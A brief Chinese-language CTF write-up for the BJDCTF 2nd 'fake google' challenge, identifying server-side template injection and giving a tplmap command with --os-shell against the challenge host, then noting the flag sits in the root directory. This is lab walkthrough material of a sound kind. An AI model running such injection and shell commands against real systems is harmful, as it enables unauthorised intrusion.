[BJDCTF 2nd]fake google

访问页面如下

 

 随便输入数值,回车后查看源代码

 

 提示是ssti模板注入

 如果对于模板注入不熟悉,可以使用tplmap

https://github.com/epinna/tplmap

使用方法和参数和sqlmap类似

python tplmap.py -u "http://6a3636c7-131e-4870-9511-4cb5691e82a1.node3.buuoj.cn/qaq?name=qq" --os-shell

flag位于系统根目录下面

 

 手工注入参考文章:https://www.cnblogs.com/h3zh1/p/12549581.html

 

posted @ 2020-07-04 15:43  GTX690M  阅读(180)  评论(0编辑  收藏  举报